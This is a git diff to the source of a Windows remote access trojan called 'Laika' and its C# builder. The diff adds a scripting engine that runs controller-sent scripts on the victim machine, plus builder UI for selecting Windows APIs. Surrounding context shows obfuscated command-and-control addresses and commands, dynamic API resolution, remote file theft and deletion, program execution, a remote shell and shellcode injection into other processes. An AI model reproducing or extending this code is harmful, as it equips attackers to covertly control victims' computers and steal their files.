diff --git a/.gitignore b/.gitignore index 4732f7c..14eedc9 100644 --- a/.gitignore +++ b/.gitignore @@ -5,4 +5,5 @@ Release x64 *.bin bin -obj \ No newline at end of file +obj +packages \ No newline at end of file diff --git a/Laika.sln b/Laika.sln index 5efafdc..68c3000 100644 --- a/Laika.sln +++ b/Laika.sln @@ -4,9 +4,17 @@ Microsoft Visual Studio Solution File, Format Version 12.00 VisualStudioVersion = 17.1.32407.343 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Laika", "Laika\Laika.vcxproj", "{6C8DD8FE-E960-43B4-B757-EFFA9FE6BB00}" + ProjectSection(ProjectDependencies) = postProject + {6365D58B-DF8C-46B2-A93D-78D988A34FE8} = {6365D58B-DF8C-46B2-A93D-78D988A34FE8} + EndProjectSection EndProject Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Server", "Server\Server.csproj", "{ECBAF9B2-2988-480B-973E-50A6BDC7016E}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "pasm", "pasm\msvc\pasm.vcxproj", "{6365D58B-DF8C-46B2-A93D-78D988A34FE8}" + ProjectSection(ProjectDependencies) = postProject + {ECBAF9B2-2988-480B-973E-50A6BDC7016E} = {ECBAF9B2-2988-480B-973E-50A6BDC7016E} + EndProjectSection +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Any CPU = Debug|Any CPU @@ -41,6 +49,18 @@ Global {ECBAF9B2-2988-480B-973E-50A6BDC7016E}.Release|x64.Build.0 = Release|Any CPU {ECBAF9B2-2988-480B-973E-50A6BDC7016E}.Release|x86.ActiveCfg = Release|Any CPU {ECBAF9B2-2988-480B-973E-50A6BDC7016E}.Release|x86.Build.0 = Release|Any CPU + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Debug|Any CPU.ActiveCfg = Debug|x64 + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Debug|Any CPU.Build.0 = Debug|x64 + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Debug|x64.ActiveCfg = Debug|x64 + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Debug|x64.Build.0 = Debug|x64 + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Debug|x86.ActiveCfg = Debug|Win32 + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Debug|x86.Build.0 = Debug|Win32 + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Release|Any CPU.ActiveCfg = Release|x64 + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Release|Any CPU.Build.0 = Release|x64 + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Release|x64.ActiveCfg = Release|x64 + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Release|x64.Build.0 = Release|x64 + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Release|x86.ActiveCfg = Release|Win32 + {6365D58B-DF8C-46B2-A93D-78D988A34FE8}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/Laika/Laika.vcxproj b/Laika/Laika.vcxproj index 73cee7a..03204ed 100644 --- a/Laika/Laika.vcxproj +++ b/Laika/Laika.vcxproj @@ -74,6 +74,7 @@ true ..\bin\ ..\obj\ + $(SolutionDir)pasm/bin;../pasm/bin;$(LibraryPath) true @@ -84,11 +85,13 @@ false ..\bin\ ..\obj\ + $(SolutionDir)pasm/bin;../pasm/bin;$(LibraryPath) true ..\bin\ ..\obj\ + $(SolutionDir)pasm/bin;../pasm/bin;$(LibraryPath) false @@ -97,6 +100,7 @@ * ..\bin\ ..\obj\ + $(SolutionDir)pasm/bin;../pasm/bin;$(LibraryPath) false @@ -117,7 +121,7 @@ Console true - %(AdditionalDependencies) + pasm.lib;%(AdditionalDependencies) true main true @@ -147,7 +151,7 @@ false - %(AdditionalDependencies) + pasm.lib;%(AdditionalDependencies) @@ -165,11 +169,12 @@ _DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS true MultiThreaded + stdcpp20 Console true - msvcrt.lib;%(AdditionalDependencies) + pasm.lib;msvcrt.lib;%(AdditionalDependencies) @@ -178,18 +183,19 @@ true true true - NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) true Disabled Neither MultiThreaded + stdcpp20 Console true true true - %(AdditionalDependencies) + pasm.lib;%(AdditionalDependencies) false diff --git a/Laika/file_explorer.c b/Laika/file_explorer.c index 0d61a08..712a8e0 100644 --- a/Laika/file_explorer.c +++ b/Laika/file_explorer.c @@ -72,7 +72,7 @@ char* get_file_list(const char* dirPath, int* numFiles) { // Add the file/folder name to the array if (numFound >= maxFiles) { maxFiles *= 2; - fileList = (char**)Api.HeapReAlloc(_crt_heap, HEAP_ZERO_MEMORY, fileList, maxFiles * sizeof(char*)); + fileList = (char**)Api.Heaprealloc_(_crt_heap, HEAP_ZERO_MEMORY, fileList, maxFiles * sizeof(char*)); } fileList[numFound] = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, strlen(fileName) + 1); strcpy(fileList[numFound], fileName); @@ -95,10 +95,10 @@ char* get_file_list(const char* dirPath, int* numFiles) { if (i < numFound - 1) { strcat(fileNames, "/"); } - Api.HeapFree(_crt_heap, 0, fileList[i]); + Api.Heapfree_(_crt_heap, 0, fileList[i]); } - Api.HeapFree(_crt_heap, 0, fileList); + Api.Heapfree_(_crt_heap, 0, fileList); // Set the numFiles parameter to the number of files/folders found *numFiles = numFound; @@ -186,7 +186,7 @@ int download_file(HANDLE fp, SOCKET sock) { FD_SET(sock, &write_fds); if (Api.select(sock + 1, NULL, &write_fds, NULL, NULL) == SOCKET_ERROR) { - Api.HeapFree(_crt_heap, 0, data); + Api.Heapfree_(_crt_heap, 0, data); Api.CloseHandle(fp); Sleep_(Sleep_TIME); return 0; @@ -194,7 +194,7 @@ int download_file(HANDLE fp, SOCKET sock) { } else { Api.send(sock, "", strlen(""), 0); - Api.HeapFree(_crt_heap, 0, data); + Api.Heapfree_(_crt_heap, 0, data); Api.CloseHandle(fp); Sleep_(Sleep_TIME); return 0; @@ -209,7 +209,7 @@ int download_file(HANDLE fp, SOCKET sock) { Api.send(sock, "", strlen(""), 0); Api.CloseHandle(fp); - Api.HeapFree(_crt_heap, 0, data); + Api.Heapfree_(_crt_heap, 0, data); return 1; } @@ -239,7 +239,7 @@ void upload_file(SOCKET sock, HANDLE file_handle) { } // Close the file handle - Api.HeapFree(_crt_heap, 0, buffer); + Api.Heapfree_(_crt_heap, 0, buffer); return; } @@ -253,7 +253,7 @@ char* upload_file_to_mem(SOCKET sock, size_t *total_bytes) { int num_bytes = 0; size_t buffer_capacity = BUFFER_SIZE; - int iOptVal = 5000; + int iOptVal = 500; int iOptLen = sizeof(int); Api.setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&iOptVal, iOptLen); @@ -262,13 +262,13 @@ char* upload_file_to_mem(SOCKET sock, size_t *total_bytes) { while ((num_bytes = Api.recv(sock, buffer + *total_bytes, BUFFER_SIZE, 0)) > 0 || (num_bytes == -1 && Api.WSAGetLastError() == WSAEWOULDBLOCK)) { if (num_bytes > 0) { *total_bytes += num_bytes; - // Reallocate the buffer if necessary + // realloc_ate the buffer if necessary if (*total_bytes + BUFFER_SIZE > buffer_capacity) { buffer_capacity *= 2; - char* new_buffer = (char*)Api.HeapReAlloc(_crt_heap, HEAP_ZERO_MEMORY, buffer, buffer_capacity); + char* new_buffer = (char*)Api.Heaprealloc_(_crt_heap, HEAP_ZERO_MEMORY, buffer, buffer_capacity); if (!new_buffer) { - Api.HeapFree(_crt_heap, 0, buffer); - return NULL; // Memory reallocation failed + Api.Heapfree_(_crt_heap, 0, buffer); + return NULL; // Memory realloc_ation failed } buffer = new_buffer; } @@ -277,11 +277,11 @@ char* upload_file_to_mem(SOCKET sock, size_t *total_bytes) { buffer[*total_bytes] = '\0'; - // Reallocate to the exact size of the received data - char* final_buffer = (char*)Api.HeapReAlloc(_crt_heap, HEAP_ZERO_MEMORY, buffer, *total_bytes); + // realloc_ate to the exact size of the received data + char* final_buffer = (char*)Api.Heaprealloc_(_crt_heap, HEAP_ZERO_MEMORY, buffer, *total_bytes); if (!final_buffer) { - Api.HeapFree(_crt_heap, 0, buffer); - return NULL; // Memory reallocation failed + Api.Heapfree_(_crt_heap, 0, buffer); + return NULL; // Memory realloc_ation failed } return final_buffer; diff --git a/Laika/libc.c b/Laika/libc.c index 11afff5..0f3b62d 100644 --- a/Laika/libc.c +++ b/Laika/libc.c @@ -19,6 +19,16 @@ char* strcpy_(char* dest, const char* src) { return dest; } +char* strncpy_(char* dest, const char* src, size_t n) { + size_t i = 0; + + for (; i < n && src[i] != 0; i++) + dest[i] = src[i]; + for (; i < n; i++) + dest[i] = 0; + return dest; +} + void *memset_(void* a, int val, size_t size) { if (a == NULL) return NULL; @@ -168,6 +178,56 @@ wchar_t* wcsstr_(const wchar_t* haystack, const wchar_t* needle) { return NULL; } +char** split_lines(const char* fileContent, int* lineCount) { + int lines = 0; + const char* start = fileContent; + const char* end = fileContent; + char** result = NULL; + + while (*end != '\0') { + if (*end == '\n') { + int lineLength = end - start + 1; + + if (result == NULL) { + result = Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, sizeof(char*) * (lines + 1)); + } + else { + result = Api.Heaprealloc_(_crt_heap, HEAP_ZERO_MEMORY, result, sizeof(char*) * (lines + 1)); + } + + result[lines] = Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, lineLength + 1); + strncpy_(result[lines], start, lineLength); + result[lines][lineLength] = '\0'; + lines++; + + if (*end == '\r' && *(end + 1) == '\n') { + end++; + } + else if (*end == '\n' && *(end + 1) == '\r') { + end++; + } + + start = end + 1; + } + end++; + } + if (start != end) { + int lineLength = end - start; + if (result == NULL) { + result = Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, sizeof(char*) * (lines + 1)); + } + else { + result = Api.Heaprealloc_(_crt_heap, HEAP_ZERO_MEMORY, result, sizeof(char*) * (lines + 1)); + } + result[lines] = Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, lineLength + 1); + strncpy_(result[lines], start, lineLength); + result[lines][lineLength] = '\0'; // Null-terminate the line + lines++; + } + *lineCount = lines; + return result; +} + void* my_GetProcAddress(HMODULE hModule, LPCSTR lpProcName) { if (hModule == NULL) { return NULL; diff --git a/Laika/libc.h b/Laika/libc.h index 306fb07..5e3e6fa 100644 --- a/Laika/libc.h +++ b/Laika/libc.h @@ -12,5 +12,6 @@ size_t mbstowcs_(wchar_t* dest, const char* src, size_t n); size_t wcstombs_(char* dest, const wchar_t* src, size_t n); int wcscmp_(const wchar_t* s1, const wchar_t* s2); wchar_t* wcsstr_(const wchar_t* haystack, const wchar_t* needle); +char** split_lines(const char* fileContent, int* lineCount); void* my_GetProcAddress(HMODULE hModule, LPCSTR lpProcName); void* get_ntfunction(const char* func); diff --git a/Laika/main.c b/Laika/main.c index f3d352a..066fa84 100644 --- a/Laika/main.c +++ b/Laika/main.c @@ -1,4 +1,5 @@ #include "libc.h" +#include "../pasm/include/pasm.h" #include #include @@ -8,6 +9,7 @@ #include "utils.h" #include "config.h" #include "resolve_apis.h" +#include "libc.h" #include "file_explorer.h" #define SHELLCODE @@ -50,7 +52,7 @@ DWORD WINAPI redirect_i_thread(LPVOID lpParameter) { } } - Api.HeapFree(_crt_heap, 0, buffer); + Api.Heapfree_(_crt_heap, 0, buffer); return 0; } @@ -86,7 +88,7 @@ DWORD WINAPI redirect_o_thread(LPVOID lpParameter) { } } } - Api.HeapFree(_crt_heap, 0, buffer); + Api.Heapfree_(_crt_heap, 0, buffer); return 0; } @@ -162,7 +164,7 @@ retry: serv = 0; } - //on fait une copie de l'ip chiffrée, puis on la free + //on fait une copie de l'ip chiffrée, puis on la free_ //ça évite qu'elle reste dans la mémoire trop longtemps //ça évite aussi qu'on utilise CAESAR_DECRYPT sur une ip déjà décryptée size_t len = strlen(fallback_servers[serv]); @@ -171,7 +173,7 @@ retry: server.sin_addr.s_addr = Api.inet_addr(CAESAR_DECRYPT(Tmp)); - Api.HeapFree(_crt_heap, 0, Tmp); + Api.Heapfree_(_crt_heap, 0, Tmp); server.sin_port = Api.htons(fallback_servers_ip[serv]); @@ -211,14 +213,14 @@ retry: if (Api.recv(sock, path, MAX_PATH, 0) <= 0) { //recv failed - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); Sleep_(Sleep_TIME); goto retry; } Api.DeleteFileA(CAESAR_DECRYPT(path)); - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); } if (strncmp_(server_reply, "ijqdinw", strlen("ijqdinw")) == 0) { //del_dir @@ -228,7 +230,7 @@ retry: if (Api.recv(sock, path, MAX_PATH, 0) <= 0) { //recv failed - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); Sleep_(Sleep_TIME); goto retry; } @@ -237,8 +239,8 @@ retry: delete_folder(wstr); - Api.HeapFree(_crt_heap, 0, (LPWSTR)wstr); - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, (LPWSTR)wstr); + Api.Heapfree_(_crt_heap, 0, path); } if (strncmp_(server_reply, "ljydtgodnskt", strlen("ljydtgodnskt")) == 0) { //get_obj_info @@ -248,12 +250,12 @@ retry: if (Api.recv(sock, path, MAX_PATH, 0) <= 0) { //recv failed - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); Sleep_(Sleep_TIME); goto retry; } char infos = get_obj_info(CAESAR_DECRYPT(path)); - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); if (Api.send(sock, &infos, 1, 0) < 0) { //send failed Sleep_(Sleep_TIME); @@ -268,12 +270,12 @@ retry: if (Api.send(sock, drives, strlen(drives), 0) < 0) { //send failed - Api.HeapFree(_crt_heap, 0, drives); + Api.Heapfree_(_crt_heap, 0, drives); Sleep_(Sleep_TIME); goto retry; } - Api.HeapFree(_crt_heap, 0, drives); + Api.Heapfree_(_crt_heap, 0, drives); } if (strncmp_(server_reply, "j}jhzyj", strlen("j}jhzyj")) == 0) { //execute @@ -286,7 +288,7 @@ retry: memset_(&pi, 0, sizeof(pi)); if (Api.recv(sock, path, MAX_PATH, 0) <= 0) { - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); Sleep_(Sleep_TIME); goto retry; } @@ -304,7 +306,7 @@ retry: &pi // Pointer to PROCESS_INFORMATION structure ); - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); } #ifdef SHELLCODE @@ -313,7 +315,7 @@ retry: if (Api.recv(sock, arch, 2, 0) <= 0) { //send failed - Api.HeapFree(_crt_heap, 0, arch); + Api.Heapfree_(_crt_heap, 0, arch); Sleep_(Sleep_TIME); goto retry; } @@ -335,11 +337,11 @@ retry: proc = FindProcessByArch(L"x64"); } - Api.HeapFree(_crt_heap, 0, arch); + Api.Heapfree_(_crt_heap, 0, arch); if (proc == NULL) { Api.send(sock, "fail", strlen("fail"), 0); - Api.HeapFree(_crt_heap, 0, file); + Api.Heapfree_(_crt_heap, 0, file); Sleep_(Sleep_TIME); goto retry; } @@ -347,7 +349,7 @@ retry: LPVOID addr = Api.VirtualAllocEx(proc, NULL, fsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (addr == NULL) { Api.send(sock, "fail", strlen("fail"), 0); - Api.HeapFree(_crt_heap, 0, file); + Api.Heapfree_(_crt_heap, 0, file); Api.CloseHandle(proc); Sleep_(Sleep_TIME); goto retry; @@ -355,7 +357,7 @@ retry: if (Api.WriteProcessMemory(proc, addr, file, fsize, NULL) == 0) { Api.send(sock, "fail", strlen("fail"), 0); - Api.HeapFree(_crt_heap, 0, file); + Api.Heapfree_(_crt_heap, 0, file); Api.CloseHandle(proc); Sleep_(Sleep_TIME); goto retry; @@ -364,13 +366,13 @@ retry: HANDLE hThread = Api.CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)addr, NULL, 0, NULL); if (hThread == NULL) { Api.send(sock, "fail", strlen("fail"), 0); - Api.HeapFree(_crt_heap, 0, file); + Api.Heapfree_(_crt_heap, 0, file); Api.CloseHandle(proc); Sleep_(Sleep_TIME); goto retry; } - Api.HeapFree(_crt_heap, 0, file); + Api.Heapfree_(_crt_heap, 0, file); Api.CloseHandle(proc); Api.CloseHandle(hThread); Api.send(sock, "ok", strlen("ok"), 0); @@ -384,8 +386,8 @@ retry: if (Api.recv(sock, path, MAX_PATH, 0) <= 0) { //recv failed - Api.HeapFree(_crt_heap, 0, file_list); - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, file_list); + Api.Heapfree_(_crt_heap, 0, path); Sleep_(Sleep_TIME); goto retry; } @@ -394,8 +396,8 @@ retry: file_list = get_file_list(CAESAR_DECRYPT(path), &num_files); if (file_list == NULL) { - Api.HeapFree(_crt_heap, 0, file_list); - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, file_list); + Api.Heapfree_(_crt_heap, 0, path); Sleep_(Sleep_TIME); goto retry; } @@ -403,13 +405,13 @@ retry: if (Api.send(sock, file_list, strlen(file_list), 0) < 0) { //send failed - Api.HeapFree(_crt_heap, 0, file_list); - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, file_list); + Api.Heapfree_(_crt_heap, 0, path); Sleep_(Sleep_TIME); goto retry; } - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); } if (strncmp_(server_reply, "it|sqtfidknqj", strlen("it|sqtfidknqj")) == 0) { //download_file @@ -419,13 +421,13 @@ retry: if (Api.recv(sock, path, MAX_PATH, 0) <= 0) { //recv failed - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); Sleep_(Sleep_TIME); goto retry; } HANDLE hFile = Api.CreateFileA(CAESAR_DECRYPT(path), GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); if (hFile == NULL) { @@ -446,7 +448,7 @@ retry: if (Api.recv(sock, path, MAX_PATH, 0) <= 0) { //recv failed - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); Sleep_(Sleep_TIME); goto retry; } @@ -455,17 +457,17 @@ retry: HANDLE file_handle = Api.CreateFileW(wstr, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (file_handle == INVALID_HANDLE_VALUE) { - Api.HeapFree(_crt_heap, 0, path); - Api.HeapFree(_crt_heap, 0, (LPWSTR)wstr); + Api.Heapfree_(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, (LPWSTR)wstr); goto retry; } - Api.HeapFree(_crt_heap, 0, (LPWSTR)wstr); + Api.Heapfree_(_crt_heap, 0, (LPWSTR)wstr); upload_file(sock, file_handle); Api.CloseHandle(file_handle); - Api.HeapFree(_crt_heap, 0, path); + Api.Heapfree_(_crt_heap, 0, path); } if (strncmp_(server_reply, "xmjqq", strlen("xmjqq")) == 0) { //shell @@ -591,11 +593,37 @@ retry: goto retry; } } + + if (strncmp_(server_reply, "ufxr", strlen("ufxr")) == 0) { //pasm + size_t fsize = 0; + char* file = upload_file_to_mem(sock, &fsize); + if (file == NULL) { + Api.send(sock, "fail", strlen("fail"), 0); + Sleep_(Sleep_TIME); + goto retry; + } + + int line_count = 0; + char** lines = split_lines(file, &line_count); + if (lines == NULL) { + Api.send(sock, "fail", strlen("fail"), 0); + Api.Heapfree_(_crt_heap, 0, file); + Sleep_(Sleep_TIME); + goto retry; + } + + pasm_run_script(NULL, lines, line_count, sock); + + Api.send(sock, "Qfnpf?%jsi%tk%xhwnuy", strlen("Qfnpf?%jsi%tk%xhwnuy"), 0); //Laika: end of script + Api.Heapfree_(_crt_heap, 0, file); + if (lines != NULL) + Api.Heapfree_(_crt_heap, 0, lines); + } } /* Never used Api.closesocket(sock); - FreeApis(); + free_Apis(); */ return 0; } @@ -618,4 +646,4 @@ BOOL APIENTRY main(HMODULE hModule, } return TRUE; } -*/ \ No newline at end of file +*/ diff --git a/Laika/resolve_apis.c b/Laika/resolve_apis.c index 75ae467..26c1730 100644 --- a/Laika/resolve_apis.c +++ b/Laika/resolve_apis.c @@ -26,8 +26,8 @@ void InitApis() { Api.CreateFileA = (TCreateFileA)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("HwjfyjKnqjF")); Api.HeapAlloc = (THeapAlloc)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("MjfuFqqth")); Api.HeapCreate = (THeapCreate)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("MjfuHwjfyj")); - Api.HeapFree = (THeapFree)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("MjfuKwjj")); - Api.HeapReAlloc = (THeapReAlloc)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("MjfuWjFqqth")); + Api.Heapfree_ = (THeapfree_)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("MjfuKwjj")); + Api.Heaprealloc_ = (THeaprealloc_)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("MjfuWjFqqth")); Api.CreateFileW = (TCreateFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("HwjfyjKnqj\\")); Api.ReadFile = (TReadFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("WjfiKnqj")); Api.WriteFile = (TWriteFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjKnqj")); diff --git a/Laika/resolve_apis.h b/Laika/resolve_apis.h index da7ce38..a15fdd7 100644 --- a/Laika/resolve_apis.h +++ b/Laika/resolve_apis.h @@ -51,9 +51,9 @@ typedef HANDLE(WINAPI* TCreateRemoteThread)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_ typedef HANDLE(WINAPI* TCreateFileA)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE); typedef BOOL(WINAPI* TCreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION); typedef LPVOID(WINAPI* THeapAlloc)(HANDLE, DWORD, SIZE_T); -typedef BOOL(WINAPI* THeapFree)(HANDLE, DWORD, LPVOID); +typedef BOOL(WINAPI* THeapfree_)(HANDLE, DWORD, LPVOID); typedef HANDLE(WINAPI* THeapCreate)(DWORD, SIZE_T, SIZE_T); -typedef LPVOID(WINAPI* THeapReAlloc)(HANDLE, DWORD, LPVOID, SIZE_T); +typedef LPVOID(WINAPI* THeaprealloc_)(HANDLE, DWORD, LPVOID, SIZE_T); typedef BOOL(WINAPI* TDeleteFileA)(LPCSTR); typedef BOOL(WINAPI* TFindClose)(HANDLE); typedef DWORD(WINAPI* TGetLogicalDrives)(VOID); @@ -85,8 +85,8 @@ typedef struct ApiList { TCreateProcessA CreateProcessA; TCreateRemoteThread CreateRemoteThread; THeapCreate HeapCreate; - THeapFree HeapFree; - THeapReAlloc HeapReAlloc; + THeapfree_ Heapfree_; + THeaprealloc_ Heaprealloc_; THeapAlloc HeapAlloc; TDeleteFileA DeleteFileA; TCreateFileW CreateFileW; @@ -116,5 +116,7 @@ typedef struct ApiList { TlstrcatW lstrcatW; } API; +extern API Api; + void InitApis(); -//void FreeApis(); Never called \ No newline at end of file +//void free_Apis(); Never called \ No newline at end of file diff --git a/Laika/shellcode.c b/Laika/shellcode.c index 428c406..b179f59 100644 --- a/Laika/shellcode.c +++ b/Laika/shellcode.c @@ -1,8 +1,6 @@ #include "shellcode.h" #include "libc.h" -extern API Api; - HANDLE FindProcessByArch(const wchar_t* arch) { STARTUPINFOW si; diff --git a/Screenshots/builder.png b/Screenshots/builder.png index 4e356d7..a4252cf 100644 Binary files a/Screenshots/builder.png and b/Screenshots/builder.png differ diff --git a/Screenshots/main_menu.png b/Screenshots/main_menu.png index 2361ba5..b81a40f 100644 Binary files a/Screenshots/main_menu.png and b/Screenshots/main_menu.png differ diff --git a/Screenshots/pasm_editor.png b/Screenshots/pasm_editor.png new file mode 100644 index 0000000..412f2e1 Binary files /dev/null and b/Screenshots/pasm_editor.png differ diff --git a/Server/App.config b/Server/App.config index 193aecc..91126fc 100644 --- a/Server/App.config +++ b/Server/App.config @@ -1,6 +1,14 @@ - + + + + + + + + + \ No newline at end of file diff --git a/Server/BuildMenu.Designer.cs b/Server/BuildMenu.Designer.cs index cc23ed1..8ad944c 100644 --- a/Server/BuildMenu.Designer.cs +++ b/Server/BuildMenu.Designer.cs @@ -53,10 +53,20 @@ this.button3 = new System.Windows.Forms.Button(); this.pictureBox1 = new System.Windows.Forms.PictureBox(); this.label9 = new System.Windows.Forms.Label(); + this.label10 = new System.Windows.Forms.Label(); + this.label11 = new System.Windows.Forms.Label(); + this.label12 = new System.Windows.Forms.Label(); + this.Selected_apis = new System.Windows.Forms.ListBox(); + this.searchBox = new System.Windows.Forms.TextBox(); + this.searchResultsListBox = new System.Windows.Forms.ListBox(); + this.label13 = new System.Windows.Forms.Label(); + this.contextMenuStrip2 = new System.Windows.Forms.ContextMenuStrip(this.components); + this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.contextMenuStrip1.SuspendLayout(); ((System.ComponentModel.ISupportInitialize)(this.numericUpDown1)).BeginInit(); ((System.ComponentModel.ISupportInitialize)(this.numericUpDown2)).BeginInit(); ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit(); + this.contextMenuStrip2.SuspendLayout(); this.SuspendLayout(); // // Hosts @@ -241,7 +251,7 @@ // button2 // this.button2.Enabled = false; - this.button2.Location = new System.Drawing.Point(81, 415); + this.button2.Location = new System.Drawing.Point(257, 415); this.button2.Name = "button2"; this.button2.Size = new System.Drawing.Size(213, 38); this.button2.TabIndex = 18; @@ -293,11 +303,94 @@ this.label9.Size = new System.Drawing.Size(325, 2); this.label9.TabIndex = 23; // + // label10 + // + this.label10.BorderStyle = System.Windows.Forms.BorderStyle.Fixed3D; + this.label10.Location = new System.Drawing.Point(363, 15); + this.label10.Name = "label10"; + this.label10.Size = new System.Drawing.Size(2, 394); + this.label10.TabIndex = 24; + // + // label11 + // + this.label11.AutoSize = true; + this.label11.Location = new System.Drawing.Point(371, 9); + this.label11.Name = "label11"; + this.label11.Size = new System.Drawing.Size(64, 13); + this.label11.TabIndex = 25; + this.label11.Text = "pasm config"; + // + // label12 + // + this.label12.BorderStyle = System.Windows.Forms.BorderStyle.Fixed3D; + this.label12.Location = new System.Drawing.Point(437, 15); + this.label12.Name = "label12"; + this.label12.Size = new System.Drawing.Size(254, 2); + this.label12.TabIndex = 26; + // + // Selected_apis + // + this.Selected_apis.FormattingEnabled = true; + this.Selected_apis.Location = new System.Drawing.Point(374, 41); + this.Selected_apis.Name = "Selected_apis"; + this.Selected_apis.Size = new System.Drawing.Size(173, 368); + this.Selected_apis.TabIndex = 27; + this.Selected_apis.MouseDown += new System.Windows.Forms.MouseEventHandler(this.Selected_apis_MouseDown); + // + // searchBox + // + this.searchBox.Location = new System.Drawing.Point(553, 28); + this.searchBox.Name = "searchBox"; + this.searchBox.Size = new System.Drawing.Size(138, 20); + this.searchBox.TabIndex = 28; + this.searchBox.Text = "Search for an API"; + this.searchBox.TextChanged += new System.EventHandler(this.SearchBox_TextChanged); + // + // searchResultsListBox + // + this.searchResultsListBox.FormattingEnabled = true; + this.searchResultsListBox.Location = new System.Drawing.Point(553, 54); + this.searchResultsListBox.Name = "searchResultsListBox"; + this.searchResultsListBox.Size = new System.Drawing.Size(138, 355); + this.searchResultsListBox.TabIndex = 29; + this.searchResultsListBox.SelectedIndexChanged += new System.EventHandler(this.SearchResultsListBox_SelectedIndexChanged); + // + // label13 + // + this.label13.AutoSize = true; + this.label13.Location = new System.Drawing.Point(371, 26); + this.label13.Name = "label13"; + this.label13.Size = new System.Drawing.Size(127, 13); + this.label13.TabIndex = 30; + this.label13.Text = "Selected Windows APIs :"; + // + // contextMenuStrip2 + // + this.contextMenuStrip2.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.toolStripMenuItem1}); + this.contextMenuStrip2.Name = "contextMenuStrip1"; + this.contextMenuStrip2.Size = new System.Drawing.Size(108, 26); + // + // toolStripMenuItem1 + // + this.toolStripMenuItem1.Image = global::Server.Properties.Resources.delete; + this.toolStripMenuItem1.Name = "toolStripMenuItem1"; + this.toolStripMenuItem1.Size = new System.Drawing.Size(107, 22); + this.toolStripMenuItem1.Text = "Delete"; + this.toolStripMenuItem1.Click += new System.EventHandler(this.toolStripMenuItem1_Click); + // // BuildMenu // this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; - this.ClientSize = new System.Drawing.Size(355, 465); + this.ClientSize = new System.Drawing.Size(703, 465); + this.Controls.Add(this.label13); + this.Controls.Add(this.searchResultsListBox); + this.Controls.Add(this.searchBox); + this.Controls.Add(this.Selected_apis); + this.Controls.Add(this.label12); + this.Controls.Add(this.label11); + this.Controls.Add(this.label10); this.Controls.Add(this.label9); 